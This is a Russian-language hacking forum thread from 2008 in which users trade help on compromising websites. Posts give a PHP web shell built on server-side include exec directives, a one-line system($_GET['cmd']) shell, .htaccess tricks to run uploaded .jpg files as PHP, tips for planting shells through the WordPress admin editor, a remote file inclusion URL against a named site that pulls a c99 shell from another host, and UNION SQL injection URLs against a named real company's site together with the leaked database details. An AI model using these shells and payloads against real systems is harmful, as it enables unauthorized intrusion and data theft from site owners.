Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Спайдер

    Joined:
    18 Apr 2008
    Messages:
    5
    Likes Received:
    13
    Reputations:
    2
  2. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    если можешь менять файл можешь через ccи попытатся
    https://forum.antichat.ru/showpost.php?p=568232&postcount=9

    я написал себе этот маленкий шелл для этого
    PHP:
    <?php
    if ($handle = @fopen("./a.shtml"'w')) 
    { @
    fwrite($handle'<!--#exec cmd="'.$_POST['a'].'"-->'); }
    echo 
    '<form name="a" method="post" action="">
    <textarea name="textarea" id="textarea" cols="121" rows="24"> '
    ;
    @include(
    "http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ;
    echo 
    ' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> ';
    ?>
     
    #1722 nicusor, 22 Apr 2008
    Last edited: 22 Apr 2008
  3. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
    Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
     
  4. Спайдер

    Joined:
    18 Apr 2008
    Messages:
    5
    Likes Received:
    13
    Reputations:
    2
    омг! пиздец
    выполни phpinfo() , найди поля disable functions и скопипасть сюда
     
    2 people like this.
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ, знает кто, где мона потренирвоаться с заливкой шеллов ? :Р
     
  6. Спайдер

    Joined:
    18 Apr 2008
    Messages:
    5
    Likes Received:
    13
    Reputations:
    2
    на локалхосте
     
    2 people like this.
  7. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Как залить шелл в Wordpress ?!
     
  8. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    если есть доступ к админке, то отредактировать нужную страницу. system(); etc
     
  9. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    есть, пробывал Fetal Error или File edited successfully. и потом выплняю
    http://www.site.com/wp-admin/plugin-editor.php?file=get-recent-comments/get-recent-comments.php?cmd=ls пишет Sorry, that file cannot be edited. хотя файл сохранён
     
  10. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    я как-то заливал так. в .htaccess дописывал
    Code:
    AddHandler application/x-httpd-php .jpg
    ищел в добовление новости, там было загрузить картинку, банально лил шелл с окончание jpg и все)
     
  11. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    я забыл добавить .. так как на моём хосте всё в конфиге апача написано

    Надо создать файл .htaccess
    с содержанием

    Code:
    AddType text/html .shtml
    AddHandler server-parsed .shtml
    Options +Include
    дальше можешь запустить скрипт который я написал выше
    или же создать файл с расширением .shtml и написать в нём
    Code:
    <!--#exec cmd="ls -la"--> 
    где ls -la команда которую ты хочешь выполнить на сервере

    и открыть его на сервере. пример www.site.ru/a.shtml
     
  12. Art-Ge-Force

    Art-Ge-Force Member

    Joined:
    19 Apr 2008
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
  13. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    это уязвимость нзвается инклудом ч/з него иногда можно лит web-shell, вот юзай, например, это шелл, http://www.kat.kg/index.php?file=http://madnet.name/files/download/9_c99madshell.php
     
  14. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database(),user(),version()),0x71),0x71),6,7/*


    что можно ещё нарыть ?
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    nicusor
    Там восемь столбцов
    _http://www.moldagrotehnica.md/index.php?newsid=-66+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),4,5,6,7,8/*
    agro@localhost:4.1.14:moldagrotehnica_md
    Подбирай таблицы если надо
     
    #1735 Kakoytoxaker, 23 Apr 2008
    Last edited: 23 Apr 2008
  16. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    там 7 столбцов 100% ..

    как подбирать ?
    http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7+from+<table>/* где <table> самые распространенные имена, правильно?
     
  17. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    nicusor, правильно. Есть ещё такая штука - посимвольный подбор.
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    nicusor
    Друг мой. Интересно зачем задавать вопрос, если не слушать ответа на него?
    Специально для тебя я привёл ссылку , пройдя по которой ты увидишь вывод из таблицы
    Правда в моей ссылке(как впрочем и в базе) полей 8 и если ты догадаешься убрать из неё пробелы будет гораздо проще
     
    #1738 Kakoytoxaker, 23 Apr 2008
    Last edited: 23 Apr 2008
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Пробывал залить шелл на этот сайт. Почему пишет Warning: system() [function.system]: Cannot execute a blank command in http://site.com/script.php on line 1

    В скрипте обычный вызов функции систем().Пробывал с кавычками и без них)
    <?php system($_GET['cmd']); ?>
     
  20. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    это значит system отключено, юзай include
     
Thread Status:
Not open for further replies.